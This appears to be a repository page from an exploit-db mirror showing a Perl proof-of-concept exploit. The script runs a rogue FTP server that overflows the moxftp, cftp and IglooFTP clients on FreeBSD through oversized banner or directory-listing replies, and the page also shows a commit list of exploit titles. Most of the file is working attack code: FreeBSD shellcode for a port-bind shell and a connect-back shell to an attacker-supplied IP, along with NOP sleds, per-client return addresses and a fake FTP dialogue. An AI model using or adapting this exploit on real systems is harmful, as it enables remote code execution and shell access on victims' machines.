bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/remote/22278.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

180 lines
No EOL
5.6 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/6921/info
A buffer overflow vulnerability has been reported for moxftp. The vulnerability occurs when moxftp is parsing 'Welcome' banner messages from remote FTP servers. When moxftp receives an overly long FTP banner, it will trigger the overflow condition.
An attacker can exploit this vulnerability by enticing a victim moxftp user to connect to a malicious FTP server.
Any attacker-supplied code will be executed on the victim system with the privileges of the moxftp process.
This vulnerability also affects xftp which is based upon moxftp.
#!/usr/bin/perl
# PoC exploit for iglooftp, cftp and moxftp for freebsd
# moxftp / mftp 2.2
# cftp 0.12
# Iglooftp 0.6.1
# Some of the code is fucked, the passive connection is a cheap hack and will not
# respawn, so the fake ftpd will have to be restarted... (only IglooFTP)
# Some RET adr's change, this can be fixed with gdb, look into it yourself..
# all the clients are from ports.. some may have been fixed, did this shit some
# time ago..
# thanks to kokanin for help and advice
# code by inv[at]dtors
use IO::Socket;
sub convert_ret {
my($ret) = @_;
for ($x=8; $x>0; $x=$x-2){
$ret = substr($ret_temp,$x,2);
$new_ret .= chr hex "$ret";
}
return $new_ret;
}
sub convert_ip {
my($ip) = @_;
@ip_tmp = split(/\./, $ip);
for($x=0; $x<4; $x++) {
$new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}
$server_port = 21;
$passive_server_port = 10324;
unless(@ARGV == 3 || @ARGV == 2)
{ die
"Usage ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}
($shellcode_arg, $client_arg, $extra_arg) = @ARGV;
$user_ip = convert_ip($extra_arg);
@shellcode_list = (
"Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
"Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");
@client_list = (
"IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
"cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
"mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
"cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
"IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
"mftp - FreeBSD 5.0,532,0xbfbff950,1,100");
@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);
print "\tDSR-ftp_clients by inv\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";
$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);
$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;
$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;
if(@client_info[3] eq "1") {
$nops_x = "\x90"x@client_info[1];
$nops_y = "\x90"x@client_info[4];
$exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}
if($client_arg == 0 or $client_arg == 4) {
$exploit_string ="total 666
drwxr-xr-x 25 root wheel 1536 Jan 28 00:13 .
drwxr-xr-x 14 root wheel 512 Jan 28 00:13 ..
-rwxr-xr-x 2 inv inv 512 Jan 29 01:00 $nops$shellcode$ret";
}
$server = IO::Socket::INET->new(LocalPort => $server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "Can't listen on $server_port : $!\n";
while ($client = $server->accept()) {
if(@client_info[3] == 1) {
print $client "220 $exploit_string\n";
}
if(@client_info[3] eq "0") {
print $client "220 0xdeadcode\n";
while($request !=~ /QUIT/i) {
$request = <$client>;
print $request;
if($request =~ /PASS/i) {
print $client "230 User anonymous logged in.\n";
}
if($request =~ /USER/i) {
print $client "331 Password required for anonymous.\n";
}
if($request =~ /SYST/i) {
print $client "215 UNIX Type: L8\n";
}
if($request =~ /REST/i) {
print $client "350 Restarting.\n";
}
if($request =~ /TYPE/i) {
print $client "200 Type set to A.\n";
}
if($request =~ /PWD/i or $request =~ /FEAT/i) {
print $client "257 \"/usr/home/inv/\" is current directory.\n";
}
if($request =~ /PASV/i) {
$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "Can't open passive port";
print $client "227 Entering Passive Mode (127,0,0,1,40,84)\n";
}
if ($request =~ /LIST/i) {
while($passive_client = $passive_server->accept()){
print $client "150 Starting transfer.\n";
print $passive_client $exploit_string;
close $passive_client;
print $client "226 BANG YOU ARE DEAD!!!\n";
}
}
}
close $client;
}
}
Reference in a new issue View git blame Copy permalink